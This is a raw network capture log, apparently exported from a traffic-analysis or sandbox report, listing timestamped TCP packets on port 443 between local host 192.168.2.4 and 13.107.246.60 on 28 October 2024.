                                                                    Oct 28, 2024 14:03:31.420844078 CET4434984813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:31.421024084 CET49848443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:31.421113014 CET49848443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:31.421122074 CET4434984813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:31.423561096 CET4434984313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:31.423706055 CET4434984313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:31.423794985 CET49843443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:31.423794985 CET49843443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:31.423860073 CET49843443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:31.423866987 CET4434984313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:31.425770044 CET49849443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:31.425801039 CET4434984913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:31.425986052 CET49849443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:31.426068068 CET49849443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:31.426079988 CET4434984913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:31.460732937 CET4434984513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:31.460886002 CET4434984513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:31.460985899 CET49845443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:31.460985899 CET49845443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:31.461111069 CET49845443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:31.461132050 CET4434984513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:31.462897062 CET49850443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:31.462913036 CET4434985013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:31.463176966 CET49850443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:31.463176966 CET49850443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:31.463196039 CET4434985013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.014386892 CET4434984613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.014882088 CET49846443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.014919996 CET4434984613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.015449047 CET49846443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.015455008 CET4434984613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.116055965 CET4434984713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.116436958 CET49847443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.116483927 CET4434984713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.116842031 CET49847443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.116858006 CET4434984713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.156402111 CET4434984613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.156902075 CET4434984613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.156985044 CET49846443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.157015085 CET49846443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.157015085 CET49846443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.157030106 CET4434984613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.157041073 CET4434984613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.159729958 CET49851443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.159790039 CET4434985113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.159868002 CET49851443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.160032034 CET49851443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.160063028 CET4434985113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.163050890 CET4434984813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.163429976 CET49848443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.163440943 CET4434984813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.163752079 CET49848443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.163757086 CET4434984813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.163799047 CET4434984913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.164031982 CET49849443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.164067030 CET4434984913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.164438009 CET49849443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.164448977 CET4434984913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.190289021 CET4434985013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.194156885 CET49850443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.194166899 CET4434985013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.194626093 CET49850443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.194631100 CET4434985013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.249306917 CET4434984713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.249430895 CET4434984713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.249495983 CET49847443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.249634027 CET49847443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.249660969 CET4434984713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.249686956 CET49847443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.249701023 CET4434984713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.252326965 CET49852443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.252418041 CET4434985213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.252506018 CET49852443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.252633095 CET49852443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.252667904 CET4434985213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.294538975 CET4434984913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.294698000 CET4434984913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.294776917 CET49849443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.294837952 CET49849443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.294837952 CET49849443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.294864893 CET4434984913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.294891119 CET4434984913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.297072887 CET49853443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.297164917 CET4434985313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.297241926 CET49853443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.297383070 CET49853443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.297410965 CET4434985313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.298242092 CET4434984813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.298384905 CET4434984813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.298455954 CET49848443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.298487902 CET49848443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.298487902 CET49848443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.298501968 CET4434984813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.298511028 CET4434984813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.300349951 CET49854443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.300390959 CET4434985413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.300534964 CET49854443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.300659895 CET49854443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.300682068 CET4434985413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.318937063 CET4434985013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.319067955 CET4434985013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.319129944 CET49850443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.319158077 CET49850443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.319178104 CET4434985013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.319188118 CET49850443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.319191933 CET4434985013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.320918083 CET49855443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.320950031 CET4434985513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.321077108 CET49855443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.321227074 CET49855443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.321253061 CET4434985513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.896399975 CET4434985113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.897010088 CET49851443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.897058010 CET4434985113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.897459030 CET49851443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.897471905 CET4434985113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.979811907 CET4434985213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.980520964 CET49852443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.980520964 CET49852443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:32.980601072 CET4434985213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:32.980632067 CET4434985213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.026441097 CET4434985113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.026820898 CET4434985113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.026951075 CET49851443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.026951075 CET49851443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.027009964 CET49851443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.027044058 CET4434985113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.027133942 CET4434985413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.029586077 CET49856443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.029678106 CET4434985613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.029900074 CET49854443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.029903889 CET49856443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.029927015 CET4434985413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.030133009 CET49856443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.030167103 CET4434985613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.030282974 CET49854443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.030296087 CET4434985413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.056091070 CET4434985313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.056394100 CET49853443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.056431055 CET4434985313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.056765079 CET49853443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.056776047 CET4434985313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.067311049 CET4434985513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.067637920 CET49855443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.067652941 CET4434985513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.068006039 CET49855443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.068017006 CET4434985513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.110182047 CET4434985213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.111933947 CET4434985213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.112032890 CET49852443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.112034082 CET49852443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.112092972 CET49852443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.112124920 CET4434985213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.114172935 CET49857443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.114222050 CET4434985713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.114399910 CET49857443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.114399910 CET49857443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.114464045 CET4434985713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.155024052 CET4434985413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.155163050 CET4434985413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.155370951 CET49854443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.155370951 CET49854443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.155471087 CET49854443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.155489922 CET4434985413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.157341003 CET49858443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.157380104 CET4434985813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.157531977 CET49858443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.157577991 CET49858443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.157603025 CET4434985813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.187745094 CET4434985313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.187944889 CET4434985313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.188052893 CET49853443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.188097000 CET49853443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.188097954 CET49853443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.188122988 CET4434985313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.188148022 CET4434985313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.189861059 CET49859443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.189898968 CET4434985913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.190041065 CET49859443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.190126896 CET49859443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.190150976 CET4434985913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.197602034 CET4434985513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.197796106 CET4434985513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.197882891 CET49855443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.197882891 CET49855443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.197882891 CET49855443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.199743032 CET49860443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.199798107 CET4434986013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.199897051 CET49860443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.200100899 CET49860443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.200129032 CET4434986013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.419356108 CET49855443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.419375896 CET4434985513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.765897036 CET4434985613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.766427040 CET49856443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.766453981 CET4434985613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.767117977 CET49856443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.767131090 CET4434985613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.860748053 CET4434985713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.861718893 CET49857443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.861718893 CET49857443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.861772060 CET4434985713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.861812115 CET4434985713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.894757032 CET4434985813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.895195007 CET49858443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.895252943 CET4434985813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.895505905 CET49858443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.895519972 CET4434985813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.896277905 CET4434985613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.896646023 CET4434985613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.896753073 CET49856443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.896753073 CET49856443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.896753073 CET49856443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.899213076 CET49861443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.899249077 CET4434986113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.899333000 CET49861443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.899473906 CET49861443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.899492025 CET4434986113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.917644978 CET4434985913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.918185949 CET49859443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.918220997 CET4434985913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.920928955 CET49859443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.920945883 CET4434985913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.943730116 CET4434986013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.944209099 CET49860443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.944247961 CET4434986013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.944613934 CET49860443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.944631100 CET4434986013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.990189075 CET4434985713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.990246058 CET4434985713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.990314007 CET49857443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.990359068 CET4434985713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.990391016 CET4434985713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.990442038 CET49857443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.990506887 CET49857443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.990545034 CET4434985713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.990571022 CET49857443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.990586996 CET4434985713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.993758917 CET49862443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.993808985 CET4434986213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:33.993928909 CET49862443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.994113922 CET49862443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:33.994138002 CET4434986213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.024194956 CET4434985813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.024338007 CET4434985813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.024405003 CET49858443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.024455070 CET49858443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.024491072 CET4434985813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.024517059 CET49858443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.024548054 CET4434985813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.026595116 CET49863443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.026621103 CET4434986313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.026745081 CET49863443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.026829958 CET49863443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.026842117 CET4434986313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.045339108 CET4434985913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.045514107 CET4434985913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.045614958 CET49859443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.045660019 CET49859443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.045660019 CET49859443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.045682907 CET4434985913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.045703888 CET4434985913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.047460079 CET49864443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.047559023 CET4434986413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.047636032 CET49864443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.047786951 CET49864443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.047822952 CET4434986413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.073889017 CET4434986013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.073939085 CET4434986013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.074002028 CET49860443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.074024916 CET4434986013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.074063063 CET4434986013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.074136019 CET49860443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.074264050 CET49860443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.074264050 CET49860443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.074290037 CET4434986013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.074312925 CET4434986013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.076366901 CET49865443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.076406956 CET4434986513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.076544046 CET49865443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.076628923 CET49865443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.076639891 CET4434986513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.199882984 CET49856443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.199907064 CET4434985613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.635771036 CET4434986113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.636282921 CET49861443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.636298895 CET4434986113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.636742115 CET49861443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.636749983 CET4434986113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.734880924 CET4434986213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.735268116 CET49862443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.735354900 CET4434986213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.735608101 CET49862443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.735626936 CET4434986213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.762476921 CET4434986313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.762868881 CET49863443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.762881041 CET4434986313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.763289928 CET49863443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.763295889 CET4434986313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.764996052 CET4434986113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.765054941 CET4434986113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.765105009 CET49861443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.765115023 CET4434986113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.765166044 CET49861443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.765187979 CET4434986113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.765300989 CET49861443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.765341997 CET49861443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.765367031 CET4434986113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.765377998 CET49861443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.765386105 CET4434986113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.768035889 CET49866443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.768119097 CET4434986613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.768192053 CET49866443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.768357038 CET49866443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.768388987 CET4434986613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.795057058 CET4434986413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.795383930 CET49864443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.795408010 CET4434986413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.795726061 CET49864443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.795737982 CET4434986413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.823436975 CET4434986513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.823739052 CET49865443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.823764086 CET4434986513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.824054003 CET49865443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.824059010 CET4434986513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.865731955 CET4434986213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.865789890 CET4434986213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.865876913 CET49862443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.865940094 CET4434986213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.865955114 CET4434986213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.866017103 CET49862443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.866065025 CET49862443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.866065025 CET49862443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:34.866096973 CET4434986213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.866122961 CET4434986213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:34.868169069 CET49867443192.168.2.413.107.246.60
